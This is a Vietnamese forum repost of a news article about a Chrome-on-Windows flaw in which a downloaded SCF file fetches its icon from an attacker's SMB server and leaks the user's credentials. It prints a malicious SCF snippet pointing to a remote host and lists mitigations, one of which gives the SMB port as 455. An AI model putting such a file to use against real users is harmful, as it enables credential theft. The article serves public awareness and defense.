Các hacker có thể lấy cắp mật khẩu Windows của bạn thông qua Chrome

Tham gia
2/2/17
Bài viết
5,766
Được thích
7,748
2933 #1

Một nhà nghiên cứu bảo mật đã phát hiện ra lỗ hổng nghiêm trọng trong cấu hình mặc định của phiên bản Chrome mới nhất chạy trên bất kỳ phiên bản hệ điều hành Windows nào của Microsoft, bao gồm cả Windows 10, lỗ hổng này có thể cho phép tin tặc ăn cắp thông tin đăng nhập của người dùng từ xa.

Nhà nghiên cứu Bosko Stankovic của DefenseCode đã phát hiện ra rằng chỉ cần truy cập vào một trang web có chứa tệp SCF độc hại, nạn nhân có thể bị tin tặc lấy thông tin đăng nhập máy tính của họ thông qua Chrome và giao thức SMB.

Kỹ thuật này không phải là mới, và đã được khai thác bởi Stuxnet - một loại phần mềm độc hại mạnh được thiết kế để tiêu diệt chương trình hạt nhân của Iran - sử dụng các tệp LNK của Windows để xâm nhập hệ thống. Tuy nhiên, đây là lần đầu tiên kỹ thuật này được sử dụng trên Google Chrome.

Chrome + SCF + SMB = Ăn cắp thông tin của Windows

Định dạng tập tin SCF (Shell Command File) tương tự như các tệp LNK và được thiết kế để hỗ trợ một số lệnh Windows Explorer giúp xác định biểu tượng trên máy tính của bạn, chẳng hạn như My ComputerRecycle Bin.

"Hiện tại, kẻ tấn công chỉ cần lôi kéo nạn nhân (sử dụng Google Chrome và Windows) truy cập trang web của mình là đã sử dụng lại các chứng chỉ xác thực của nạn nhân", Stankovic viết trong một bài đăng trên blog, mô tả lỗ hổng.

Về cơ bản, các tệp LNK xác định biểu tượng trong Windows có cú pháp như sau:

Code:
[Shell]
Command = 2
IconFile = explorer.exe, 3
  • Vị trí biểu tượng
  • Link dẫn đến hình thu nhỏ, tên ứng dụng và vị trí của nó.
Google Chrome tin cậy các tập tin Windows SCF, nên kẻ tấn công có thể lừa nạn nhân truy cập vào trang web của họ, trang web đó có chứa một tập tin độc hại được tải xuống tự động vào các hệ thống mà không cần sự cho phép của người dùng. Ngay khi người dùng mở thư mục có chứa tệp tin đã tải xuống, ngay lập tức hoặc sau đó tệp này sẽ tự động chạy để lấy ra một biểu tượng mà không cần người dùng phải nhấp vào.

Nhưng thay vì đặt vị trí của hình ảnh biểu tượng, tệp tin SCF độc hại do kẻ tấn công tạo ra chứa vị trí của máy chủ SMB từ xa (do kẻ tấn công kiểm soát).

Code:
[Shell]
IconFile = \\ 170.170.170.170 \ icon

Vì vậy, ngay khi tập tin SCF cố lấy lại hình ảnh biểu tượng, nó sẽ cố gắng thực hiện việc xác thực tự động với máy chủ điều khiển từ xa của kẻ tấn công qua giao thức SMB, trao tên người dùng của nạn nhân và password, cho phép kẻ tấn công sử dụng thông tin xác thực tới máy tính cá nhân hoặc tài nguyên mạng của bạn.

Tuy nhiên, theo các cuộc tấn công của Stuxnet, Microsoft buộc các tập tin LNK phải tải các biểu tượng của họ chỉ từ các tài nguyên cục bộ nên họ không còn dễ bị tấn công.


Làm thế nào để ngăn chặn các cuộc tấn công liên quan đến xác thực SMB

Rất đơn giản, bạn chỉ cần chặn kết nối SMB gửi đi (các cổng TCP 139 và 455) từ mạng cục bộ đến mạng WAN thông qua tường lửa để các máy tính local không thể truy vấn các máy chủ SMB từ xa.

Stankovic cũng khuyến cáo người dùng xem xét việc tắt tự động tải xuống trong Google Chrome bằng cách vào Settings > Show advanced settings, sau đó check vào cài đặt Ask where to save each file before downloading.

Tùy chọn này cho phép bạn tự phê duyệt mỗi lần trình duyệt tải tập tin xuống, làm giảm đáng kể nguy cơ bị tấn công bằng tập tin SCF. Google đã nhận biết các lỗ hổng này, và đang chuẩn bị đưa ra bản vá. Tuy nhiên, không thể biết chính xác bao giờ thì bản vá mới được đưa đến tay người dùng.

Xem thêm:
 
Last edited by a moderator:

Theo dõi Youtube

Thành viên online

Quảng Cáo

Quảng Cáo

Có thể bạn quan tâm

Top Bottom